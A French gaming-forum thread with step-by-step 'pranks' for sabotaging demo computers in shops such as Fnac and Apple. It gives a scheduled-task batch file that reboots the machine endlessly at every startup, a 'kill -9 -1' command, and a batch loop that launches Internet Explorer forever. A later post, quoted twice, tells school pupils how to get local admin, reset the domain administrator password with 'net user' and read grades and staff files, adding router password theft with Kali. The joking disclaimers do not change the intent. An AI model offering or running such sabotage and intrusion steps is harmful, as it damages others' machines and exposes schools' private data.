JEU Chose à (ne pas) faire chez un Vendeur de pc

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

Nociif

2b || !2b
V
Sep 23, 2011
2,607
4
944
push location
Discord
Nociif#5969
:salut:

Il y a quelques trucs à ne pas faire quand on est dans un magasin de pc/mac (pour ne pas citer de nom :p ) Fnac, Apple, etc
Bon je vous dit ce que c'est mais ne le faites pas hein ? ;)

Pour windows:
Temps de la manip': ~2 à 5 minutes selon l'experience
Créez un fichier .bat contenant ceci:
shutdown /r /t 0
Ouvrez ensuite le menu démarrer et ouvrez ceci:
taskschd.msc
TV3Lg.png

Déroulez la biblihotèque puis clique droit sur le 'dossier' Microsoft -> "Creer une tâche de base...".
Entrez les infos et en déclencheur sélectionnez "Au démarrage de l'ordinateur", Action -> ouvrir un programme
AdeOb.png

Selectionnez ensuite votre fichier .bat, lancez le.
Le tour est joué, le pc va redémarrer sans arrêt tout seul

Source: Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Pour Mac & Linux:
Temps de la manip': ~<1 à 2 minutes
Ouvrez le Terminal
Entrez cette commande:
kill -9 -1
Cela va fermer tous les programmes ce qui résulte à un écran blanc.

-> Faire le plus d'écran blanc dans le magasin :3
Qqy1b.png
Source: un ami

Je vous rappelle que ce n'est pas quelque chose à faire :)
Donc ne notez pas ces instructions sur un papier & n'allez pas dans les magasins tester ces commandes
à vos risques & périls.


Je répète, je ne suis pas
responsable de ce que vous ferez
ou ne ferez pas avec ces scripts
trouvés sur internet par pur hasard​
 

Nociif

2b || !2b
V
Sep 23, 2011
2,607
4
944
push location
Discord
Nociif#5969
Dans la plus part des magasins les pc (et macs) sont connectés en admin.
Testé chez Apple et à la Fnac, ça marche .
 

Cruche

Membre
Jul 9, 2012
6
0
301
29
Je suis sous Windows donc je m'y connais pas trop niveau mac, comment on ouvre le terminal ??
 

Kusano

We Are Not Your Kind
Modérateur
Marchand
V
May 16, 2010
6,510
90
964
NAMEK WALLAH
Discord
kusano
:mdr1:. C'est claire que pour faire baisser le prix d'un pc y'a rien de mieux xD
 
Jan 18, 2013
7,739
2
464
Phœnix Land
Je up ce petit post

Y'a pas que ça comme idée drôle, récemment j'ai fais ça :

Code:
@echo off

:main
start iexplore.exe
goto :main

Il suffit de créer un .bat avec le code ci-dessus et de le démarrer, pas besoin d'être en administrateur pour ce code. (Il va démarrer internet explorer à l'infini, donc le PC va buguer)
 

Exomedia

名探偵コナン
V
Ancien staff
May 14, 2010
3,370
1
944
Ca me fait penser que cette année le réseau du lycée, au niveau des sessions élèves, était en panne, du coup on se connectait directement et on jouait au battleship avec les autres classes en faisant des Shutdown random... C'était drôle jusqu'à ce qu'on éteigne le PC d'un prof...
 

Hakiu

V
Nov 24, 2011
1,214
5
944
30
Deep Web
Avis aux collégiens et lycéens, quand j'étais à votre place j'me connectais sur les disques réseaux protégés. A quoi ça sert ? Accéder à tous les fichiers présents sur le serveur (Bulletins, relevés de notes, documents persos concernant le personnel enseignant et bien plus).

Pour ça : connectez vous en admin local (en exploitant la faille at:xx ou bien avec un BootCD d'Hiren's boot xD)

Puis, vous ouvrez une invite de commande en tant qu'admin, ou directement depuis le system32 et vous y placez "net user administrateur mdp_à_changer /nom_de_domaine_du_serv"

Exemple : Net user administrateur test123 /LYCEE permet ici de set le pass de la session administrateur (test123) sur le réseau LYCEE.

Les failles de ce genre sont jamais corrigées et quand vous arrivez pas à faire péter la sécurité du réseau, servez-vous d'un iso backtrack (il me semble que maintenant ça a été repris sous le nom de Kali Linux) et checkez les passwords qui ont été mis sur le panel admin du routeur, c'est souvent les mêmes qui sont utilisés sur le réseau =)
 

Apathique

Membre actif
Oct 4, 2013
136
0
136
24
Avis aux collégiens et lycéens, quand j'étais à votre place j'me connectais sur les disques réseaux protégés. A quoi ça sert ? Accéder à tous les fichiers présents sur le serveur (Bulletins, relevés de notes, documents persos concernant le personnel enseignant et bien plus).

Pour ça : connectez vous en admin local (en exploitant la faille at:xx ou bien avec un BootCD d'Hiren's boot xD)

Puis, vous ouvrez une invite de commande en tant qu'admin, ou directement depuis le system32 et vous y placez "net user administrateur mdp_à_changer /nom_de_domaine_du_serv"

Exemple : Net user administrateur test123 /LYCEE permet ici de set le pass de la session administrateur (test123) sur le réseau LYCEE.

Les failles de ce genre sont jamais corrigées et quand vous arrivez pas à faire péter la sécurité du réseau, servez-vous d'un iso backtrack (il me semble que maintenant ça a été repris sous le nom de Kali Linux) et checkez les passwords qui ont été mis sur le panel admin du routeur, c'est souvent les mêmes qui sont utilisés sur le réseau =)

C'est pas gentil de parler comme ça D: . Perso j'apprécie jouer à l'ordi et non traficoter dessus donc ce que t'as écrit c'était (pour moi) aussi compréhensible que "lqzrjzr,kqz;jrh;k,lqzrkljqzrqzn," .
 

Drobat

Membre actif
Mar 24, 2013
262
0
221
androbot.altervista.org
Avis aux collégiens et lycéens, quand j'étais à votre place j'me connectais sur les disques réseaux protégés. A quoi ça sert ? Accéder à tous les fichiers présents sur le serveur (Bulletins, relevés de notes, documents persos concernant le personnel enseignant et bien plus).

Pour ça : connectez vous en admin local (en exploitant la faille at:xx ou bien avec un BootCD d'Hiren's boot xD)

Puis, vous ouvrez une invite de commande en tant qu'admin, ou directement depuis le system32 et vous y placez "net user administrateur mdp_à_changer /nom_de_domaine_du_serv"

Exemple : Net user administrateur test123 /LYCEE permet ici de set le pass de la session administrateur (test123) sur le réseau LYCEE.

Les failles de ce genre sont jamais corrigées et quand vous arrivez pas à faire péter la sécurité du réseau, servez-vous d'un iso backtrack (il me semble que maintenant ça a été repris sous le nom de Kali Linux) et checkez les passwords qui ont été mis sur le panel admin du routeur, c'est souvent les mêmes qui sont utilisés sur le réseau =)

Ce genre de connerie dans mon lycée c'est vite trouvé et c'est exclusion du lycée + une amande si il porte plainte.
 

Hakiu

V
Nov 24, 2011
1,214
5
944
30
Deep Web
Ce genre de connerie dans mon lycée c'est vite trouvé et c'est exclusion du lycée + une amande si il porte plainte.

J'ai pas donné les méthodes pour pas laisser de traces :x
Le problème c'est qu'en général des mecs capables de bidouiller un peu les machines au lycée ils sont vites captés et tout leur retombe dessus même quand ils ont rien fait (Comment ça, ça sent le vécu ? xD).
 
Thread starter Similar threads Forum Replies Date
nikidcl Discussion Général 0